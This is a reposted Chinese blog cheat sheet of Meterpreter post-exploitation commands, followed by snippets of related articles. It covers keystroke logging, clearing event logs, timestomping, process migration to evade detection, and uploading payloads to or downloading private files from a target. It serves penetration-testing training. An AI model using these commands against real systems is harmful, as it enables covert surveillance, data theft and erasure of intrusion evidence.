meterpreter基础命令大全

最新推荐文章于 2025-07-15 02:28:59 发布
转载 最新推荐文章于 2025-07-15 02:28:59 发布 · 601 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/php09/p/10495162.html
文章标签:

#shell #ruby #数据库

本文详细介绍Meterpreter模块的基础、文件系统及网络相关命令,包括如何利用这些命令进行后渗透操作,如获取系统信息、文件操作、网络配置及提权等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

meterpreter

meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用.为后渗透提供了很多便捷之处

基础命令

我们进入meterpreter之后,键入 ? 即可进入帮助文档. 我们进入帮助文档可以看到帮助文档被分成了好几个模块...

Core Commands(基础命令)

?              帮助文档

background           让meterprter处于后台模式

sessions -i [id]         与会话进行交互,id表示会话的id号

quit              退出会话

shell               获得控制台权限(前提是在meterpreter环境下,exit退出当前shell,返回到meterpreter)

irb              开启ruby终端

shutdown           关机

reboot             重启

clearev              清除目标机器上的事件日志

sysinfo            查看目标系统信息 比如主机名,ip.操作系统等

getprivs             获取尽可能多的特权

getuid             查看权限

kill [pid]             杀死进程

write             给支持的信道中写数据

execute -H -i -f cmd.exe     创建新进程cmd -H不可见,-i交互

migrate pid               将meterpreter会话移植到进程数为pid的进程中

getpid             查看当前进程的pid  

ps              查看当前活跃进程

File system Commands(文件相关)

cat            查看文件内容

show_mount         查看目标机磁盘系统

getwd            查看当前工作目录

search -f          搜索指定文件(-h进入帮助手册). 还可以搜索类型. 还支持通配符. 例如 search -f *.txt ,搜索到某个文件后可以使用cat查看  

edit            对指定文件进行编辑

download          对指定文件进行下载

upload               对指定文件上传, 后面跟上要上传的路径和目标系统保存的路径

cp                复制文件. 参数等同上传文件

rm             删除文件

dir                列出当前目录下的文件

mkdir            新建文件夹

rmdir            删除文件夹

lcd             返回本机上一层目录

lpwd             显示本机工作路径  

Networking Commands(网络相关)

ipconfig/ifconfig       查看网络接口信息

route           获取路由表信息

portfwd          端口转发

 

 

System Commands(网络相关)

User interface Commands(用户界面)

screenshot        截屏

keyscan_start        开启键盘监听

keyscan_dump      导出键盘记录的内容

keyscan_stop         停止键盘记录的内容

getdesktop        开启当前的meterpreter工作桌面

enumdesktops       列出所有可访问桌面站和窗口站

Webcan Commands(摄像头相关)

Elevate Commands(提权相关)

Timestomp        更改文件属性(MACE)

Pswwrod database Commands(密码破解相关)

Timestomp Commands(文件属性相关)

转载于:https://www.cnblogs.com/php09/p/10495162.html

Metasploit(一)--Meterpreter命令速查表
weixin_34167819的博客
08-27 1018
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
Meterpreter后渗透模块命令字典
m0_57221101的博客
04-14 849
一.系统命令 1.快捷操作 此板块用于记录用于操作meterpreter的指令 sessions #查看全部会话 –h 查看帮助 sessions -i <shell ID> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 2.基础系统命令 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系
meterpreter环境下的命令
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
Meterpreter命令合集
最新发布
鹿鸣天涯
07-15 910
download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload setup.exe C:\\windows\\system32。
Meterpreter基础命令
公众号shadow sock7
05-25 2375
helpbackground把已打开的session放到后台cat输出文件文件内容cd && pwdclearev清除Windows上的应用日志,系统日志,和安全日志Demometerpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0
Meterpreter命令合集(详细)
2302_76986722的博客
09-16 3153
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
Meterpreter的常用命令合集
热门推荐
妖魔鬼怪快离开的博客
11-25 1万+
getsystem #会自动利用各种各样的系统漏洞来进行权限提升 migrate #进程id进程迁移 background #把当前的会话设置为背景,需要的时候在启用 getuid #查看对方正在运行的用户 ps #列出所有的进程 getpid #返回运行meterpreter的id号 sysinfo #产看系统信息和体系结构 shell #切换到cmd的系统权限方式 e
Metasploit进阶:Meterpreter基础功能与使用
Metasploit简介与Meterpreter概述 ## 1.1 Metasploit框架简介 Metasploit框架是一款功能强大的开源渗透测试工具,旨在帮助安全研究人员和渗透测试人员有效地发现、利用和验证安全漏洞。Metasploit提供了丰富的...
安全小白必看的Windows渗透基础命令大全
05-07 1693
在这里推荐一下我的同名公众号:程序员启航 Windows发展历史 Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。 MS-Dos 版本号 发布时间 Windows1.0 1985.11 Windows2.0 1987.12 Windows2.1 1988 Windows3.0 1990.5 ..
Metasploit Meterpreter命令与功能详解
# 1. Metasploit简介 ## 1.1 Metasploit基本概念 Metasploit是一款开源的渗透测试工具,旨在帮助安全专家识别和利用安全漏洞。它包含了数百种渗透测试工具,Payloads、Exploits等,...## 1.3 Meterpreter简介 Meter
Metasploit进阶笔记之Meterpreter配置
K
11-09 340
Meterpreter payload 支持多种传输方式,包括和。本文档描述了这些传输的工作原理。
【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全
08-06 4600
【kali-漏洞利用】Meterpreter后渗透
meterpreter命令总结
sweetie 的博客
06-03 3231
前言 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。 常用命令 sessions -i 进入会话 sessions -k 杀死会话 pwd 查看当前目录 getuid 查看当前用户信息 sysinfo 查看远程主机系统信息 execute
meterpeter命令
weixin_45284423的博客
12-08 127
【代码】meterpeter命令
Meterpreter基本命令详解
小人物的博客
05-14 2853
基本命令 1.background 命令 &amp;nbsp;&amp;nbsp; 将Meterpreter终端隐藏在后台 2.sessions 命令 &amp;nbsp;&amp;nbsp;查看已经成功获取的会话 3.quit 命令 &amp;nbsp;&amp;nbsp; 直接关闭当前的Meterpreter命令 4.shell 命令 &amp;nbsp;&amp;nbsp;可以获取系统的控制台Shell,如果目标系统上的命
meterpreter常用命令
Kalds157551973的博客
11-25 632
实际上,Meterpreter 提供了一个非常强大的命令集,能够有效帮助测试人员在目标网络中实现全面控制。通过获取系统中存在的有效令牌 (Token),可以在不直接获得权限的情况下提升到更高权限的账户。搜索目标系统上的文件,常用于查找特定类型的文件(如数据库文件、密码文件等)。获取当前用户的所有权限,可以帮助评估是否有提升为管理员或系统级用户的可能性。这是一个用于权限提升的插件目录,其中包含一些常见的提升权限的模块。显示目标系统的 ARP 缓存表,帮助攻击者识别网络上的其他设备。
meterpreter常用命令
Kalds157551973的博客
11-24 819
Meterpreter 会话迁移到另一个进程,以躲避检测。启用隐蔽模式,减少被防病毒软件或入侵检测系统发现的风险。列出当前所有活动的 Meterpreter 会话。启动系统的命令shell,可以执行系统命令。显示目标系统的基本信息(操作系统、架构等)。显示目标的路由表,或在目标上添加/删除路由。切换到指定的 Meterpreter 会话。退出 Meterpreter 会话。将文件从本地机器上传到目标系统。显示目标系统的 IP 配置信息。从目标系统下载文件到本地机器。显示当前系统上运行的进程列表。
meterpreter实用命令---个人实战整理
weixin_44155363的博客
03-25 1751
meterpreter实用命令 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令shell 如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理...
meterpreter常用命令
纯心缺
11-02 1570
核心命令 =============     命令说明     ------- -----------     ?帮助菜单     background      背景当前会话     bg                       别名为背景     bgkill                 杀死背景meterpreter脚本     bglist                 列出...
Meterpreter 上传文件
03-23
<think>好的,用户想了解如何使用Meterpreter上传文件,需要具体的命令示例和用法。首先,我需要回顾Meterpreter的基本文件操作命令,尤其是上传相关的指令。记得Meterpreter的upload命令用于将本地文件上传到目标机器,但具体语法可能需要确认。 接下来,我应该先检查用户提供的引用内容,看看是否有相关信息。不过根据给出的引用[3],里面提到了meterpreter控制技巧总结和命令详解,但具体内容没有详细说明上传文件的步骤。因此可能需要依靠已有的知识来回答。 步骤一:确认用户是否已经获得了一个Meterpreter会话。上传文件的前提是已经建立了会话,所以可能需要先说明这一点。但用户的问题可能已经假设在会话中。 步骤二:解释upload命令的基本语法。通常格式是`upload 本地文件路径 [目标路径]`,其中目标路径可选,默认为当前工作目录。需要举例说明,比如上传本地的test.txt到目标的C:\\Temp目录。 步骤三:提醒用户注意路径格式,特别是Windows系统需要使用双反斜杠或正斜杠。同时,可能需要提到权限问题,如果目标目录没有写入权限,上传会失败。 步骤四:补充其他相关参数,比如`-r`递归上传目录,`-i`交互模式等,这些可以增加回答的全面性。 步骤五:可能还需要提到上传后的验证,比如使用`dir`或`ls`查看目标目录,或者执行文件。此外,引用中的信息可能需要关联,但引用[3]提到的是meterpreter命令总结,可以自然地添加引用标识。 最后,确保回答结构清晰,分步骤说明,并给出示例,同时生成相关问题。需要检查是否符合之前的系统级指令,比如使用正确的中文,数学公式格式(虽然这里可能不需要),以及引用标识的位置。</think>### Meterpreter上传文件操作步骤 1. **前提条件** 确保已通过`exploit`模块建立Meterpreter会话,并成功获取目标系统控制权限[^3]。 2. **基础命令语法** ``` upload <本地文件路径> [目标路径] ``` - `<本地文件路径>`:攻击机上的文件绝对路径(如`/root/test.txt`) - `[目标路径]`:目标机器存储位置(可选,默认当前目录) 3. **具体操作示例** ```bash # 上传单个文件到目标当前目录 upload /var/log/test.log # 上传文件到指定目录(Windows路径) upload /root/payload.exe C:\\Windows\\Temp # 递归上传整个文件夹 upload -r /opt/tools D:\\backup ``` 4. **关键参数说明** - `-r`:递归上传目录及子目录 - `-i`:交互模式(上传前提示确认) - `-l`:显示上传进度条 5. **验证操作** ```bash # 查看目标目录文件列表 dir C:\\Windows\\Temp # 或Linux系统 ls /tmp ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值